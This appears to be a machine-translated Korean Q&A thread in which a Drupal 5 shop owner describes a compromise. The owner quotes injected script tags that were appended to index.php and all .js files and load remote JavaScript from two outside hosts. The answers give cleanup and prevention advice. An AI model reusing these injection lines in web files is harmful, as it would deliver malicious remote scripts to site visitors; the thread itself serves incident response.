Drupal 5를 기반으로 한 온라인 상점에 관한 내용입니다.
갑자기 더 이상 작동하지 않았습니다. 사이트에 접속하니 이런 오류가 떴습니다.
구문 분석 오류: 구문 오류, 38행의 /home/public_html/index.php에 예기치 않은 '<'
추가 조사를 통해 해당 index.php 끝에서 다음 두 줄을 발견했습니다.
<script type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></script>
<!--7379ba6e55616ea66ac9d812fc0597ba-->
해당 두 줄을 수동으로 제거한 후 사이트가 다시 정상적으로 작동하는 것 같습니다.
그러나 편집 페이지와 관련된 더 많은 문제가 보고된 후에 실제로 모든 *.js 파일이 "감염"되었다는 사실을 알게 되었습니다. 모두 끝에 추가 줄이 포함되어 있습니다.
document.write('<s'+'cript type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></scr'+'ipt>');
이 사이트가 해킹됐나요? "blog.nodisposable.com"을 검색해봐도 흥미로운 내용이 나오지 않습니다. 그 사이트 자체는 합법적인 것 같습니다. 아마 자체적으로 해킹당한 것 같은데요?
어떻게 이런 일이 일어날 수 있었는지 설명할 수 있는 사람이 있나요? 이것을 되돌리려면 어떻게 해야 합니까? 그리고 앞으로 이런 일이 발생하지 않도록 하려면 어떻게 해야 합니까?
업데이트
웹 사이트(데이터베이스 아님)의 백업을 복원한 후 이 문제가 다시 발생했지만 이제 스크립트 태그가 dolfy.sedonahyperbarics.com:8080/XHTML.js.
분명히 무작위로 많은 Drupal 사용자 계정도 생성되었습니다. 따라서 이는 실제로 Drupal 취약점이라는 신호일 수 있습니다.
우리는 이를 제거하고 사용자 계정 생성을 관리자에게만 제한했습니다(처음부터 그랬어야 했다는 것을 알고 있습니다 :-s). 또한 관리자 사용자 비밀번호를 다른 것으로 변경했습니다.더 안전한.
이제 다시는 돌아오지 않기를 바랍니다.
답변1
해킹당한 경우에는 백도어가 설치되어 있는지 알 수 없습니다.
다시 포맷한 후에는 정상 작동이 확인된 백업에서 다시 설치해야 할 수도 있습니다.
시스템에 침입자가 있었던 시스템을 절대 신뢰하지 마십시오.
앞으로 이를 방지하려면 업데이트를 유지하고 실행 중인 소프트웨어에 대한 취약점과 모범 사례를 최신 상태로 유지하는 목록(드루팔 목록, 플랫폼의 보안 목록 등)을 구독해야 합니다. , 시스템을 사용하는 데 필요한 사용자에게만 서비스를 잠그고, 보안 암호를 사용하고, 일반 텍스트로 아무것도 하지 않고, 여기에 답변의 맥락을 훨씬 넘어서는 보안 모범 사례에 따라 다른 모든 것을 잠급니다. 그리고 침입자 활동을 확인하기 위해 백업을 잘 유지하고 침입 감지 기능(예: Tripwire와 같은 시스템)을 설치하세요.
답변2
응, 너 감염됐구나. 불행하게도 "어떻게"는 시간과 노력에 더 많은 투자를 하지 않고는 말할 수 없습니다. 이는 Drupal 설치(또는 해당 모듈 중 하나)의 취약점일 수도 있고, 동일한 서버에 있는 다른 앱의 취약점일 수도 있으며, 취약한(또는 도난당한) FTP 비밀번호일 수도 있습니다. 가능한 진입점.
답변3
나는 매우 유사하지만(거의 동일) Drupal과 관련이 없는 것을 보았고 그것은 확실히 해킹이었습니다.
다른 사람들이 말했듯이 환경에 대한 추가 정보 없이는 알기가 어렵습니다. 서비스 제공을 차단하기 위해 할 수 있는 가장 빠른 방법은 .js 파일에 대한 모든 요청을 거부하거나 리디렉션하는 지시어를 .htaccess 파일에 넣는 것입니다.
답변4
전적으로 내 경험에 기초한 것이지만 이와 같은 모든 해킹, 특히 재감염과 관련된 모든 해킹은 서버에 대한 FTP 액세스 권한을 가진 누군가가 로컬 시스템을 감염시키고 자격 증명을 훔치는 일로 인해 발생했습니다. FTP 로그를 확인하고 확인해야 합니다. 모든 IP 주소와 업데이트가 유효한 것으로 인식됩니다. 무언가가 다시 감염되는 경우 해당 위치에서 아주 쉽게 확인할 수 있습니다.